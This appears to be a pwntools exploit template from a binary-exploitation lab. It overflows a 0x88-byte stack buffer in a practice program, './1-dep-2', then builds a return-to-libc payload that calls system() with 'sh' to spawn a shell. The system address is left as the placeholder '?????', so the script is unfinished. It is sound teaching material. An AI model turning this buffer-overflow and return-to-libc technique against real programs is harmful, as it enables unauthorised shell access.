#!/usr/bin/env python

from pwn import *

# open a process
p = process("./1-dep-2")

# Check the buffer info from gdb - disas input_func
# -0x88(%ebp)...

# prepare a payload to crash
#[ buffer (0x88)][saved ebp][ret]
payload = b"A" * 0x88 + b"BBBB" + b"CCCC" # (0x43434343)

p.send(payload)
p.wait()

# Let's get the address of 'sh'
c = Core('core')

addr_of_sh = c.stack.find('sh')
print("Stack %s" % hex(addr_of_sh))

# Let's run system...
# get the address from gdb - by running 'b main', 'run', 'print system'

addr_system = ?????
p = process("./1-dep-2")

#[ buffer (0x88)][saved ebp][ret]
#[ buffer (0x88)][saved ebp][ system() ][XXXX][addr_of_sh]

                                # address of system...

payload = b"A" * 0x88 + b"BBBB" + p32(addr_system) + p32(addr_system) + \
        p32(addr_of_sh) + p32(addr_of_sh)

p.send(payload)
p.interactive()

quit()